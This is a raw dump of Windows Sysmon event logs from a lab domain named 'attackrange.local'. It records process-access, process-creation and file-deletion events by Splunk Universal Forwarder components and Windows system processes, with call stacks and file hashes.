Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.397{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.928{0C1E0330-F74F-60EB-C579-00000000D001}5043456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.787{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.787{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.787{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.771{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.772{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.756{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCA465E818AE0F8C8A15577A851EBFD8,SHA256=80C4B2A1388ABDBE1E4E9824D897E774CA6C36452082C352AD59A28FA61D67A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:27.351{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2240FB501E98C2688CAC18478130F6DD,SHA256=F86071FAF11EC5B9A4A0D3455D9F91718B0523C94AAB9FF7F7E9E0A8AE0C2982,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.256{0C1E0330-F74F-60EB-C479-00000000D001}28082996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.162{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E15A2F12B4DC9C33668971AE17E41DBB,SHA256=0C1A173BE6006031E7DE8383A35BC633CB1FA22FCF2E2D0587D9BE283A3BB1B2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 